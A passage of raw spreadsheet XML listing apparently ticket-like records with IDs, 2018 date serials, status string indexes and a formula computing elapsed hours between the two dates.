      <c r="F1250" s="1">
        <v>43404.716296296298</v>
      </c>
      <c r="G1250" t="s">
        <v>846</v>
      </c>
      <c r="H1250" t="str">
        <f>TEXT(F1250-E1250,"[h]")</f>
        <v>626</v>
      </c>
    </row>
    <row r="1251" spans="1:8" hidden="1">
      <c r="A1251" t="s">
        <v>3507</v>
      </c>
      <c r="B1251">
        <v>12091</v>
      </c>
      <c r="C1251" t="s">
        <v>3508</v>
      </c>
      <c r="D1251" t="s">
        <v>7</v>
      </c>
      <c r="E1251" s="1">
        <v>43378.539814814816</v>
      </c>
      <c r="F1251" s="1">
        <v>43381.662152777775</v>
      </c>
      <c r="G1251" t="s">
        <v>174</v>
      </c>
      <c r="H1251" t="str">
        <f>TEXT(F1251-E1251,"[h]")</f>
        <v>74</v>
      </c>
    </row>
    <row r="1252" spans="1:8" hidden="1">
      <c r="A1252" t="s">
        <v>3509</v>
      </c>
      <c r="B1252">
        <v>12090</v>
      </c>
      <c r="C1252" t="s">
        <v>3510</v>
      </c>
      <c r="D1252" t="s">
        <v>7</v>
      </c>
      <c r="E1252" s="1">
        <v>43378.518865740742</v>
      </c>
      <c r="F1252" s="1">
        <v>43381.689641203702</v>
      </c>
      <c r="G1252" t="s">
        <v>103</v>
      </c>
      <c r="H1252" t="str">
        <f>TEXT(F1252-E1252,"[h]")</f>
        <v>76</v>
      </c>
    </row>
    <row r="1253" spans="1:8">
      <c r="A1253" t="s">
        <v>3379</v>
      </c>
      <c r="B1253">
        <v>12089</v>
      </c>
      <c r="C1253" t="s">
        <v>3380</v>
      </c>
      <c r="D1253" t="s">
        <v>7</v>
      </c>
      <c r="E1253" s="1">
        <v>43378.476342592592</v>
      </c>
      <c r="F1253" s="1">
        <v>43383.015300925923</v>
      </c>
      <c r="G1253" t="s">
        <v>123</v>
      </c>
      <c r="H1253" t="str">
        <f>TEXT(F1253-E1253,"[h]")</f>
        <v>108</v>
      </c>
    </row>
    <row r="1254" spans="1:8">
      <c r="A1254" t="s">
        <v>3377</v>
      </c>
      <c r="B1254">
        <v>12088</v>
      </c>
      <c r="C1254" t="s">
        <v>3378</v>
      </c>
      <c r="D1254" t="s">
        <v>7</v>
      </c>
      <c r="E1254" s="1">
        <v>43378.423807870371</v>
      </c>
      <c r="F1254" s="1">
        <v>43382.107094907406</v>
      </c>
      <c r="G1254" t="s">
        <v>2264</v>
      </c>
      <c r="H1254" t="str">
        <f>TEXT(F1254-E1254,"[h]")</f>
        <v>88</v>
      </c>
    </row>
    <row r="1255" spans="1:8" hidden="1">
      <c r="A1255" t="s">
        <v>3511</v>
      </c>
      <c r="B1255">
        <v>12087</v>
      </c>
      <c r="C1255" t="s">
        <v>3512</v>
      </c>
      <c r="D1255" t="s">
        <v>7</v>
      </c>
      <c r="E1255" s="1">
        <v>43378.387002314812</v>
      </c>
      <c r="F1255" s="1">
        <v>43382.517210648148</v>
      </c>
      <c r="G1255" t="s">
        <v>1849</v>
      </c>
      <c r="H1255" t="str">
        <f>TEXT(F1255-E1255,"[h]")</f>
        <v>99</v>
      </c>
    </row>
    <row r="1256" spans="1:8" hidden="1">
      <c r="A1256" t="s">
        <v>3513</v>
      </c>
      <c r="B1256">
        <v>12086</v>
      </c>
      <c r="C1256" t="s">
        <v>3514</v>
      </c>
      <c r="D1256" t="s">
        <v>7</v>
      </c>
      <c r="E1256" s="1">
        <v>43378.104907407411</v>
      </c>
      <c r="F1256" s="1">
        <v>43378.325532407405</v>
      </c>
      <c r="G1256" t="s">
        <v>304</v>
      </c>
      <c r="H1256" t="str">
        <f>TEXT(F1256-E1256,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="1257" spans="1:8" hidden="1">
      <c r="A1257" t="s">
        <v>3515</v>
      </c>
      <c r="B1257">
        <v>12085</v>
      </c>
      <c r="C1257" t="s">
        <v>3516</v>
      </c>
      <c r="D1257" t="s">
        <v>7</v>
      </c>
      <c r="E1257" s="1">
        <v>43378.063460648147</v>
      </c>
      <c r="F1257" s="1">
        <v>43378.100023148145</v>
      </c>
      <c r="G1257" t="s">
        <v>3517</v>
      </c>
      <c r="H1257" t="str">
        <f>TEXT(F1257-E1257,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1258" spans="1:8" hidden="1">
      <c r="A1258" t="s">
        <v>3520</v>
      </c>
      <c r="B1258">
        <v>12083</v>
      </c>
      <c r="C1258" t="s">
        <v>3521</v>
      </c>
      <c r="D1258" t="s">
        <v>7</v>
      </c>
      <c r="E1258" s="1">
        <v>43377.917511574073</v>
      </c>
      <c r="F1258" s="1">
        <v>43377.9765625</v>
      </c>
      <c r="G1258" t="s">
        <v>716</v>
      </c>
      <c r="H1258" t="str">
        <f>TEXT(F1258-E1258,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1259" spans="1:8" hidden="1">
      <c r="A1259" t="s">
        <v>3522</v>
      </c>
      <c r="B1259">
        <v>12082</v>
      </c>
      <c r="C1259" t="s">
        <v>3523</v>
      </c>
      <c r="D1259" t="s">
        <v>7</v>
      </c>
      <c r="E1259" s="1">
        <v>43377.894953703704</v>
      </c>
      <c r="F1259" s="1">
        <v>43377.911666666667</v>
      </c>
      <c r="G1259" t="s">
        <v>55</v>
      </c>
      <c r="H1259" t="str">
        <f>TEXT(F1259-E1259,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1260" spans="1:8" hidden="1">
      <c r="A1260" t="s">
        <v>3524</v>
      </c>
      <c r="B1260">
        <v>12081</v>
      </c>
      <c r="C1260" t="s">
        <v>3525</v>
      </c>
      <c r="D1260" t="s">
        <v>7</v>
      </c>
      <c r="E1260" s="1">
        <v>43377.808113425926</v>
      </c>
      <c r="F1260" s="1">
        <v>43377.857766203706</v>
      </c>
      <c r="G1260" t="s">
        <v>55</v>
      </c>
      <c r="H1260" t="str">
        <f>TEXT(F1260-E1260,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1261" spans="1:8" hidden="1">
      <c r="A1261" t="s">
        <v>3526</v>
      </c>
      <c r="B1261">
        <v>12079</v>
      </c>
      <c r="C1261" t="s">
        <v>3527</v>
      </c>
      <c r="D1261" t="s">
        <v>7</v>
      </c>
      <c r="E1261" s="1">
        <v>43377.663530092592</v>
      </c>
      <c r="F1261" s="1">
        <v>43377.705891203703</v>
      </c>
      <c r="G1261" t="s">
        <v>28</v>
      </c>
      <c r="H1261" t="str">
        <f>TEXT(F1261-E1261,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1262" spans="1:8">
      <c r="A1262" t="s">
        <v>3528</v>
      </c>
      <c r="B1262">
        <v>12078</v>
      </c>
      <c r="C1262" t="s">
        <v>3529</v>
      </c>
      <c r="D1262" t="s">
        <v>7</v>
      </c>
      <c r="E1262" s="1">
        <v>43377.63113425926</v>
      </c>
      <c r="F1262" s="1">
        <v>43377.705891203703</v>
      </c>
      <c r="G1262" t="s">
        <v>16</v>
      </c>
      <c r="H1262" t="str">
        <f>TEXT(F1262-E1262,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1263" spans="1:8" hidden="1">
      <c r="A1263" t="s">
        <v>3530</v>
      </c>
      <c r="B1263">
        <v>12077</v>
      </c>
      <c r="C1263" t="s">
        <v>3531</v>
      </c>
      <c r="D1263" t="s">
        <v>7</v>
      </c>
      <c r="E1263" s="1">
        <v>43377.502800925926</v>
      </c>
      <c r="F1263" s="1">
        <v>43378.646574074075</v>
      </c>
      <c r="G1263" t="s">
        <v>304</v>
      </c>
      <c r="H1263" t="str">
        <f>TEXT(F1263-E1263,"[h]")</f>
        <v>27</v>
      </c>
    </row>
    <row r="1264" spans="1:8" hidden="1">
      <c r="A1264" t="s">
        <v>3532</v>
      </c>
      <c r="B1264">
        <v>12074</v>
      </c>
      <c r="C1264" t="s">
        <v>3533</v>
      </c>
      <c r="D1264" t="s">
        <v>7</v>
      </c>
      <c r="E1264" s="1">
        <v>43376.603356481479</v>
      </c>
      <c r="F1264" s="1">
        <v>43383.224409722221</v>
      </c>
      <c r="G1264" t="s">
        <v>37</v>
      </c>
      <c r="H1264" t="str">
        <f>TEXT(F1264-E1264,"[h]")</f>
        <v>158</v>
      </c>
    </row>
    <row r="1265" spans="1:8" hidden="1">
      <c r="A1265" t="s">
        <v>3534</v>
      </c>
      <c r="B1265">
        <v>12073</v>
      </c>
      <c r="C1265" t="s">
        <v>3535</v>
      </c>
      <c r="D1265" t="s">
        <v>7</v>
      </c>
      <c r="E1265" s="1">
        <v>43375.945023148146</v>
      </c>
      <c r="F1265" s="1">
        <v>43405.966365740744</v>
      </c>
      <c r="G1265" t="s">
        <v>3536</v>
      </c>
      <c r="H1265" t="str">
        <f>TEXT(F1265-E1265,"[h]")</f>
        <v>720</v>
      </c>
    </row>
    <row r="1266" spans="1:8">
      <c r="A1266" t="s">
        <v>3518</v>
      </c>
      <c r="B1266">
        <v>12072</v>
      </c>
      <c r="C1266" t="s">
        <v>3519</v>
      </c>
      <c r="D1266" t="s">
        <v>7</v>
      </c>
      <c r="E1266" s="1">
        <v>43375.810902777775</v>
      </c>
      <c r="F1266" s="1">
        <v>43375.844247685185</v>
      </c>
      <c r="G1266" t="s">
        <v>314</v>
      </c>
      <c r="H1266" t="str">
        <f>TEXT(F1266-E1266,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1267" spans="1:8">
      <c r="A1267" t="s">
        <v>3537</v>
      </c>
      <c r="B1267">
        <v>12070</v>
      </c>
      <c r="C1267" t="s">
        <v>3538</v>
      </c>
      <c r="D1267" t="s">
        <v>7</v>
      </c>
      <c r="E1267" s="1">
        <v>43375.651018518518</v>
      </c>
      <c r="F1267" s="1">
        <v>43394.734953703701</v>
      </c>
      <c r="G1267" t="s">
        <v>123</v>
      </c>
      <c r="H1267" t="str">
        <f>TEXT(F1267-E1267,"[h]")</f>
        <v>458</v>
      </c>
    </row>
    <row r="1268" spans="1:8" hidden="1">
      <c r="A1268" t="s">
        <v>3539</v>
      </c>
      <c r="B1268">
        <v>12068</v>
      </c>
      <c r="C1268" t="s">
        <v>3540</v>
      </c>
      <c r="D1268" t="s">
        <v>7</v>
      </c>
      <c r="E1268" s="1">
        <v>43374.887094907404</v>
      </c>
      <c r="F1268" s="1">
        <v>43377.866990740738</v>
      </c>
      <c r="G1268" t="s">
        <v>1202</v>
      </c>
      <c r="H1268" t="str">
        <f>TEXT(F1268-E1268,"[h]")</f>
        <v>71</v>
      </c>
    </row>
    <row r="1269" spans="1:8" hidden="1">
      <c r="A1269" t="s">
        <v>3541</v>
      </c>
      <c r="B1269">
        <v>12064</v>
      </c>
      <c r="C1269" t="s">
        <v>3542</v>
      </c>
      <c r="D1269" t="s">
        <v>7</v>
      </c>
      <c r="E1269" s="1">
        <v>43373.99628472222</v>
      </c>
      <c r="F1269" s="1">
        <v>43405.558194444442</v>
      </c>
      <c r="G1269" t="s">
        <v>28</v>
      </c>
      <c r="H1269" t="str">
        <f>TEXT(F1269-E1269,"[h]")</f>
        <v>757</v>
      </c>
    </row>
    <row r="1270" spans="1:8">
      <c r="A1270" t="s">
        <v>3543</v>
      </c>
      <c r="B1270">
        <v>12062</v>
      </c>
      <c r="C1270" t="s">
        <v>3544</v>
      </c>
      <c r="D1270" t="s">
        <v>7</v>
      </c>
      <c r="E1270" s="1">
        <v>43373.983344907407</v>
      </c>
      <c r="F1270" s="1">
        <v>43374.074826388889</v>
      </c>
      <c r="G1270" t="s">
        <v>16</v>
      </c>
      <c r="H1270" t="str">
        <f>TEXT(F1270-E1270,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1271" spans="1:8" hidden="1">
      <c r="B1271">
        <v>12061</v>
      </c>
      <c r="C1271" t="s">
        <v>3545</v>
      </c>
      <c r="D1271" t="s">
        <v>7</v>
      </c>
      <c r="E1271" s="1">
        <v>43373.777777777781</v>
      </c>
      <c r="F1271" s="1">
        <v>43373.882627314815</v>
      </c>
      <c r="G1271" t="s">
        <v>174</v>
      </c>
      <c r="H1271" t="str">
        <f>TEXT(F1271-E1271,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1272" spans="1:8" hidden="1">
      <c r="A1272" t="s">
        <v>3546</v>
      </c>
      <c r="B1272">
        <v>12060</v>
      </c>
      <c r="C1272" t="s">
        <v>3547</v>
      </c>
      <c r="D1272" t="s">
        <v>7</v>
      </c>
      <c r="E1272" s="1">
        <v>43373.725208333337</v>
      </c>
      <c r="F1272" s="1">
        <v>43373.794131944444</v>
      </c>
      <c r="G1272" t="s">
        <v>174</v>
      </c>
      <c r="H1272" t="str">
        <f>TEXT(F1272-E1272,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1273" spans="1:8" hidden="1">
      <c r="B1273">
        <v>12058</v>
      </c>
      <c r="C1273" t="s">
        <v>3548</v>
      </c>
      <c r="D1273" t="s">
        <v>7</v>
      </c>
      <c r="E1273" s="1">
        <v>43373.711168981485</v>
      </c>
      <c r="F1273" s="1">
        <v>43373.766886574071</v>
      </c>
      <c r="G1273" t="s">
        <v>1302</v>
      </c>
      <c r="H1273" t="str">
        <f>TEXT(F1273-E1273,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1274" spans="1:8" hidden="1">
      <c r="B1274">
        <v>12057</v>
      </c>
      <c r="C1274" t="s">
        <v>3549</v>
      </c>
      <c r="D1274" t="s">
        <v>7</v>
      </c>
      <c r="E1274" s="1">
        <v>43372.856712962966</v>
      </c>
      <c r="F1274" s="1">
        <v>43372.964907407404</v>
      </c>
      <c r="G1274" t="s">
        <v>3550</v>
      </c>
      <c r="H1274" t="str">
        <f>TEXT(F1274-E1274,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1275" spans="1:8" hidden="1">
      <c r="A1275" t="s">
        <v>3551</v>
      </c>
      <c r="B1275">
        <v>12056</v>
      </c>
      <c r="C1275" t="s">
        <v>3552</v>
      </c>
      <c r="D1275" t="s">
        <v>7</v>
      </c>
      <c r="E1275" s="1">
        <v>43372.832592592589</v>
      </c>
      <c r="F1275" s="1">
        <v>43373.530972222223</v>
      </c>
      <c r="G1275" t="s">
        <v>474</v>
      </c>
      <c r="H1275" t="str">
        <f>TEXT(F1275-E1275,"[h]")</f>
        <v>16</v>
      </c>
    </row>
    <row r="1276" spans="1:8" hidden="1">
      <c r="A1276" t="s">
        <v>2563</v>
      </c>
      <c r="B1276">
        <v>12054</v>
      </c>
      <c r="C1276" t="s">
        <v>3553</v>
      </c>
      <c r="D1276" t="s">
        <v>7</v>
      </c>
      <c r="E1276" s="1">
        <v>43372.810856481483</v>
      </c>
      <c r="F1276" s="1">
        <v>43373.698171296295</v>
      </c>
      <c r="G1276" t="s">
        <v>1302</v>
      </c>
      <c r="H1276" t="str">
        <f>TEXT(F1276-E1276,"[h]")</f>
        <v>21</v>
      </c>
    </row>
    <row r="1277" spans="1:8" hidden="1">
      <c r="A1277" t="s">
        <v>3554</v>
      </c>
      <c r="B1277">
        <v>12051</v>
      </c>
      <c r="C1277" t="s">
        <v>3555</v>
      </c>
      <c r="D1277" t="s">
        <v>7</v>
      </c>
      <c r="E1277" s="1">
        <v>43371.970393518517</v>
      </c>
      <c r="F1277" s="1">
        <v>43372.606307870374</v>
      </c>
      <c r="G1277" t="s">
        <v>1202</v>
      </c>
      <c r="H1277" t="str">
        <f>TEXT(F1277-E1277,"[h]")</f>
        <v>15</v>
      </c>
    </row>
    <row r="1278" spans="1:8" hidden="1">
      <c r="A1278" t="s">
        <v>3556</v>
      </c>
      <c r="B1278">
        <v>12048</v>
      </c>
      <c r="C1278" t="s">
        <v>3557</v>
      </c>
      <c r="D1278" t="s">
        <v>7</v>
      </c>
      <c r="E1278" s="1">
        <v>43371.28465277778</v>
      </c>
      <c r="F1278" s="1">
        <v>43371.61204861111</v>
      </c>
      <c r="G1278" t="s">
        <v>852</v>
      </c>
      <c r="H1278" t="str">
        <f>TEXT(F1278-E1278,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="1279" spans="1:8" hidden="1">
      <c r="A1279" t="s">
        <v>3558</v>
      </c>
      <c r="B1279">
        <v>12047</v>
      </c>
      <c r="C1279" t="s">
        <v>3559</v>
      </c>
      <c r="D1279" t="s">
        <v>7</v>
      </c>
      <c r="E1279" s="1">
        <v>43370.905787037038</v>
      </c>
      <c r="F1279" s="1">
        <v>43662.870937500003</v>
      </c>
      <c r="G1279" t="s">
        <v>2100</v>
      </c>
      <c r="H1279" t="str">
        <f>TEXT(F1279-E1279,"[h]")</f>
        <v>7007</v>
      </c>
    </row>
    <row r="1280" spans="1:8">
      <c r="A1280" t="s">
        <v>3560</v>
      </c>
      <c r="B1280">
        <v>12045</v>
      </c>
      <c r="C1280" t="s">
        <v>3561</v>
      </c>
      <c r="D1280" t="s">
        <v>7</v>
      </c>
      <c r="E1280" s="1">
        <v>43370.590648148151</v>
      </c>
      <c r="F1280" s="1">
        <v>43373.586898148147</v>
      </c>
      <c r="G1280" t="s">
        <v>16</v>
      </c>
      <c r="H1280" t="str">
        <f>TEXT(F1280-E1280,"[h]")</f>
        <v>71</v>
      </c>
    </row>
    <row r="1281" spans="1:8" hidden="1">
      <c r="A1281" t="s">
        <v>3562</v>
      </c>
      <c r="B1281">
        <v>12042</v>
      </c>
      <c r="C1281" t="s">
        <v>3563</v>
      </c>
      <c r="D1281" t="s">
        <v>7</v>
      </c>
      <c r="E1281" s="1">
        <v>43370.044328703705</v>
      </c>
      <c r="F1281" s="1">
        <v>43373.548229166663</v>
      </c>
      <c r="G1281" t="s">
        <v>3213</v>
      </c>
      <c r="H1281" t="str">
        <f>TEXT(F1281-E1281,"[h]")</f>
        <v>84</v>
      </c>
    </row>
    <row r="1282" spans="1:8" hidden="1">
      <c r="A1282" t="s">
        <v>3564</v>
      </c>
      <c r="B1282">
        <v>12041</v>
      </c>
      <c r="C1282" t="s">
        <v>3565</v>
      </c>
      <c r="D1282" t="s">
        <v>7</v>
      </c>
      <c r="E1282" s="1">
        <v>43369.837453703702</v>
      </c>
      <c r="F1282" s="1">
        <v>43370.251828703702</v>
      </c>
      <c r="G1282" t="s">
        <v>174</v>
      </c>
      <c r="H1282" t="str">
        <f>TEXT(F1282-E1282,"[h]")</f>
        <v>9</v>
      </c>
    </row>
    <row r="1283" spans="1:8" hidden="1">
      <c r="A1283" t="s">
        <v>1772</v>
      </c>
      <c r="B1283">
        <v>12040</v>
      </c>
      <c r="C1283" t="s">
        <v>3566</v>
      </c>
      <c r="D1283" t="s">
        <v>7</v>
      </c>
      <c r="E1283" s="1">
        <v>43369.795578703706</v>
      </c>
      <c r="F1283" s="1">
        <v>43716.714965277781</v>
      </c>
      <c r="G1283" t="s">
        <v>3567</v>
      </c>
      <c r="H1283" t="str">
        <f>TEXT(F1283-E1283,"[h]")</f>
        <v>8326</v>
      </c>
    </row>
    <row r="1284" spans="1:8" hidden="1">
      <c r="A1284" t="s">
        <v>3568</v>
      </c>
      <c r="B1284">
        <v>12038</v>
      </c>
      <c r="C1284" t="s">
        <v>3569</v>
      </c>
      <c r="D1284" t="s">
        <v>7</v>
      </c>
      <c r="E1284" s="1">
        <v>43369.62290509259</v>
      </c>
      <c r="F1284" s="1">
        <v>43402.826249999998</v>
      </c>
      <c r="G1284" t="s">
        <v>3570</v>
      </c>
      <c r="H1284" t="str">
        <f>TEXT(F1284-E1284,"[h]")</f>
        <v>796</v>
      </c>
    </row>
    <row r="1285" spans="1:8">
      <c r="A1285" t="s">
        <v>3571</v>
      </c>
      <c r="B1285">
        <v>12037</v>
      </c>
      <c r="C1285" t="s">
        <v>3572</v>
      </c>
      <c r="D1285" t="s">
        <v>7</v>
      </c>
      <c r="E1285" s="1">
        <v>43369.496296296296</v>
      </c>
      <c r="F1285" s="1">
        <v>43383.490937499999</v>
      </c>
      <c r="G1285" t="s">
        <v>3573</v>
      </c>
      <c r="H1285" t="str">
        <f>TEXT(F1285-E1285,"[h]")</f>
        <v>335</v>
      </c>
    </row>
    <row r="1286" spans="1:8" hidden="1">
      <c r="A1286" t="s">
        <v>3574</v>
      </c>
      <c r="B1286">
        <v>12036</v>
      </c>
      <c r="C1286" t="s">
        <v>3575</v>
      </c>
      <c r="D1286" t="s">
        <v>7</v>
      </c>
      <c r="E1286" s="1">
        <v>43369.044999999998</v>
      </c>
      <c r="F1286" s="1">
        <v>43382.013240740744</v>
      </c>
      <c r="G1286" t="s">
        <v>3576</v>
      </c>
      <c r="H1286" t="str">
        <f>TEXT(F1286-E1286,"[h]")</f>
        <v>311</v>
      </c>
    </row>
    <row r="1287" spans="1:8">
      <c r="A1287" t="s">
        <v>3577</v>
      </c>
      <c r="B1287">
        <v>12035</v>
      </c>
      <c r="C1287" t="s">
        <v>3578</v>
      </c>
      <c r="D1287" t="s">
        <v>7</v>
      </c>
      <c r="E1287" s="1">
        <v>43368.80872685185</v>
      </c>
      <c r="F1287" s="1">
        <v>43373.553333333337</v>
      </c>
      <c r="G1287" t="s">
        <v>16</v>
      </c>
      <c r="H1287" t="str">
        <f>TEXT(F1287-E1287,"[h]")</f>
        <v>113</v>
      </c>
    </row>
    <row r="1288" spans="1:8" hidden="1">
      <c r="A1288" t="s">
        <v>3579</v>
      </c>
      <c r="B1288">
        <v>12034</v>
      </c>
      <c r="C1288" t="s">
        <v>3580</v>
      </c>
      <c r="D1288" t="s">
        <v>7</v>
      </c>
      <c r="E1288" s="1">
        <v>43368.721018518518</v>
      </c>
      <c r="F1288" s="1">
        <v>43368.990752314814</v>
      </c>
      <c r="G1288" t="s">
        <v>3581</v>
      </c>
      <c r="H1288" t="str">
        <f>TEXT(F1288-E1288,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="1289" spans="1:8" hidden="1">
      <c r="A1289" t="s">
        <v>3582</v>
      </c>
      <c r="B1289">
        <v>12033</v>
      </c>
      <c r="C1289" t="s">
        <v>3583</v>
      </c>
      <c r="D1289" t="s">
        <v>7</v>
      </c>
      <c r="E1289" s="1">
        <v>43368.699270833335</v>
      </c>
      <c r="F1289" s="1">
        <v>43368.885844907411</v>
      </c>
      <c r="G1289" t="s">
        <v>2909</v>
      </c>
      <c r="H1289" t="str">
        <f>TEXT(F1289-E1289,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="1290" spans="1:8">
      <c r="A1290" t="s">
        <v>3584</v>
      </c>
      <c r="B1290">
        <v>12032</v>
      </c>
      <c r="C1290" t="s">
        <v>3585</v>
      </c>
      <c r="D1290" t="s">
        <v>7</v>
      </c>
      <c r="E1290" s="1">
        <v>43368.597013888888</v>
      </c>
      <c r="F1290" s="1">
        <v>43370.25105324074</v>
      </c>
      <c r="G1290" t="s">
        <v>16</v>
      </c>
      <c r="H1290" t="str">
        <f>TEXT(F1290-E1290,"[h]")</f>
        <v>39</v>
      </c>
    </row>
    <row r="1291" spans="1:8">
      <c r="A1291" t="s">
        <v>3586</v>
      </c>
      <c r="B1291">
        <v>12031</v>
      </c>
      <c r="C1291" t="s">
        <v>3587</v>
      </c>
      <c r="D1291" t="s">
        <v>7</v>
      </c>
      <c r="E1291" s="1">
        <v>43368.327291666668</v>
      </c>
      <c r="F1291" s="1">
        <v>43370.25105324074</v>
      </c>
      <c r="G1291" t="s">
        <v>25</v>
      </c>
      <c r="H1291" t="str">
        <f>TEXT(F1291-E1291,"[h]")</f>
        <v>46</v>
      </c>
    </row>
    <row r="1292" spans="1:8" hidden="1">
      <c r="B1292">
        <v>12030</v>
      </c>
      <c r="C1292" t="s">
        <v>3588</v>
      </c>
      <c r="D1292" t="s">
        <v>7</v>
      </c>
      <c r="E1292" s="1">
        <v>43368.165347222224</v>
      </c>
      <c r="F1292" s="1">
        <v>43368.293587962966</v>
      </c>
      <c r="G1292" t="s">
        <v>66</v>
      </c>
      <c r="H1292" t="str">
        <f>TEXT(F1292-E1292,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1293" spans="1:8" hidden="1">
      <c r="A1293" t="s">
        <v>3589</v>
      </c>
      <c r="B1293">
        <v>12028</v>
      </c>
      <c r="C1293" t="s">
        <v>3590</v>
      </c>
      <c r="D1293" t="s">
        <v>7</v>
      </c>
      <c r="E1293" s="1">
        <v>43367.939560185187</v>
      </c>
      <c r="F1293" s="1">
        <v>43695.863368055558</v>
      </c>
      <c r="G1293" t="s">
        <v>1969</v>
      </c>
      <c r="H1293" t="str">
        <f>TEXT(F1293-E1293,"[h]")</f>
        <v>7870</v>
      </c>
    </row>
    <row r="1294" spans="1:8" hidden="1">
      <c r="A1294" t="s">
        <v>3591</v>
      </c>
      <c r="B1294">
        <v>12027</v>
      </c>
      <c r="C1294" t="s">
        <v>3592</v>
      </c>
      <c r="D1294" t="s">
        <v>7</v>
      </c>
      <c r="E1294" s="1">
        <v>43367.591053240743</v>
      </c>
      <c r="F1294" s="1">
        <v>43367.69458333333</v>
      </c>
      <c r="G1294" t="s">
        <v>255</v>
      </c>
      <c r="H1294" t="str">
        <f>TEXT(F1294-E1294,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1295" spans="1:8" hidden="1">
      <c r="A1295" t="s">
        <v>3593</v>
      </c>
      <c r="B1295">
        <v>12025</v>
      </c>
      <c r="C1295" t="s">
        <v>3594</v>
      </c>
      <c r="D1295" t="s">
        <v>7</v>
      </c>
      <c r="E1295" s="1">
        <v>43367.362303240741</v>
      </c>
      <c r="F1295" s="1">
        <v>43606.280370370368</v>
      </c>
      <c r="G1295" t="s">
        <v>3595</v>
      </c>
      <c r="H1295" t="str">
        <f>TEXT(F1295-E1295,"[h]")</f>
        <v>5734</v>
      </c>
    </row>
    <row r="1296" spans="1:8" hidden="1">
      <c r="A1296" t="s">
        <v>1772</v>
      </c>
      <c r="B1296">
        <v>12024</v>
      </c>
      <c r="C1296" t="s">
        <v>3596</v>
      </c>
      <c r="D1296" t="s">
        <v>7</v>
      </c>
      <c r="E1296" s="1">
        <v>43367.292060185187</v>
      </c>
      <c r="F1296" s="1">
        <v>43367.662407407406</v>
      </c>
      <c r="G1296" t="s">
        <v>1098</v>
      </c>
      <c r="H1296" t="str">
        <f>TEXT(F1296-E1296,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="1297" spans="1:8" hidden="1">
      <c r="A1297" t="s">
        <v>3597</v>
      </c>
      <c r="B1297">
        <v>12021</v>
      </c>
      <c r="C1297" t="s">
        <v>3598</v>
      </c>
      <c r="D1297" t="s">
        <v>7</v>
      </c>
      <c r="E1297" s="1">
        <v>43366.549340277779</v>
      </c>
      <c r="F1297" s="1">
        <v>43366.570254629631</v>
      </c>
      <c r="G1297" t="s">
        <v>51</v>
      </c>
      <c r="H1297" t="str">
        <f>TEXT(F1297-E1297,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1298" spans="1:8" hidden="1">
      <c r="B1298">
        <v>12020</v>
      </c>
      <c r="C1298" t="s">
        <v>3599</v>
      </c>
      <c r="D1298" t="s">
        <v>7</v>
      </c>
      <c r="E1298" s="1">
        <v>43366.232442129629</v>
      </c>
      <c r="F1298" s="1">
        <v>43366.264317129629</v>
      </c>
      <c r="G1298" t="s">
        <v>1681</v>
      </c>
      <c r="H1298" t="str">
        <f>TEXT(F1298-E1298,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1299" spans="1:8" hidden="1">
      <c r="A1299" t="s">
        <v>3600</v>
      </c>
      <c r="B1299">
        <v>12019</v>
      </c>
      <c r="C1299" t="s">
        <v>3601</v>
      </c>
      <c r="D1299" t="s">
        <v>7</v>
      </c>
      <c r="E1299" s="1">
        <v>43366.155416666668</v>
      </c>
      <c r="F1299" s="1">
        <v>43366.197557870371</v>
      </c>
      <c r="G1299" t="s">
        <v>90</v>
      </c>
      <c r="H1299" t="str">
        <f>TEXT(F1299-E1299,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1300" spans="1:8" hidden="1">
      <c r="A1300" t="s">
        <v>1772</v>
      </c>
      <c r="B1300">
        <v>12018</v>
      </c>
      <c r="C1300" t="s">
        <v>3602</v>
      </c>
      <c r="D1300" t="s">
        <v>7</v>
      </c>
      <c r="E1300" s="1">
        <v>43365.75273148148</v>
      </c>
      <c r="F1300" s="1">
        <v>43366.337939814817</v>
      </c>
      <c r="G1300" t="s">
        <v>28</v>
      </c>
      <c r="H1300" t="str">
        <f>TEXT(F1300-E1300,"[h]")</f>
        <v>14</v>
      </c>
    </row>
    <row r="1301" spans="1:8" hidden="1">
      <c r="A1301" t="s">
        <v>3603</v>
      </c>
      <c r="B1301">
        <v>12017</v>
      </c>
      <c r="C1301" t="s">
        <v>3604</v>
      </c>
      <c r="D1301" t="s">
        <v>7</v>
      </c>
      <c r="E1301" s="1">
        <v>43365.440069444441</v>
      </c>
      <c r="F1301" s="1">
        <v>43365.651145833333</v>
      </c>
      <c r="G1301" t="s">
        <v>1305</v>
      </c>
      <c r="H1301" t="str">
        <f>TEXT(F1301-E1301,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="1302" spans="1:8" hidden="1">
      <c r="A1302" t="s">
        <v>3605</v>
      </c>
      <c r="B1302">
        <v>12016</v>
      </c>
      <c r="C1302" t="s">
        <v>3606</v>
      </c>
      <c r="D1302" t="s">
        <v>7</v>
      </c>
      <c r="E1302" s="1">
        <v>43365.264421296299</v>
      </c>
      <c r="F1302" s="1">
        <v>43365.369201388887</v>
      </c>
      <c r="G1302" t="s">
        <v>3607</v>
      </c>
      <c r="H1302" t="str">
        <f>TEXT(F1302-E1302,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1303" spans="1:8" hidden="1">
      <c r="A1303" t="s">
        <v>3608</v>
      </c>
      <c r="B1303">
        <v>12015</v>
      </c>
